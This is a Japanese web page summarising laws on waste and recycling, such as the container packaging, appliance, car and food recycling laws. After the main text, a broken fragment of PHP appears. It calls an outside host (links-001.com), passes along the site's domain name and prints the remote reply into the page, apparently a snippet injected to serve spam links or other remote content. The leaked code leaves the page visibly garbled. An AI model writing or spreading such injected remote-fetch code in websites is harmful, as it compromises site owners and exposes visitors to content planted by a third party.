ごみをめぐる法律について

私たちが生活していくうえで毎日様々なごみが排出されています。
このような課題を解決するために法律では廃棄物処理法が改正を加えて、ごみのリサイクルと減量化に国民も事業者も取り組むことになりました。
今までは市町村にゴミ処理がまかせられてきましたが平成の法律改正では資源のリサイクルを促進するように改正されました。
製品が生み出されるときに長期商品であること、修理やリサイクルのしやすさなど考慮する法律になりました。
容器包装リサイクル法なども制定されて、ペットボトルやトレイや容器など市町村が回収して容器メーカーがリサイクルするようにさだめています。
他にも家電リサイクル法、自動車リサイクル法、食品リサイクル法などができました。
つくった製品がどのような形で役目を終えるのか、企業も見届ける時代です。
ゴミの削減や大切に物を扱う効果と処理費用の負担を最小化できます。
大量生産、大量消費を見直して新しい循環型のエコな社会をめざすために必要な法案です。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

関連menu

更新情報

ボックス画像1

ニュースなどで度々話題に上がるごみ屋敷問題ですが、その家の周辺に住む人にとっては、不快に感じることも

ごみ屋敷問題と法律について

ボックス画像2

生活環境の保全や公衆衛生の向上のためにごみは分別、収集、そして処理されるよう法律で決まっています。<

ごみについて法律で決まっていること

ボックス画像3

昔の日本において、日常生活で発生したごみは、家庭で処理することが一般的でした。
例えば農家であ

ごみの回収と法律の関係

ボックス画像4

昔の家庭から出たごみは、ほとんど分別することなく、一斉に自治体が回収して処理をしていました。

家電製品のリサイクル

Copyright© 法律 ごみ All Rights Reserved.

ごみをめぐる法律について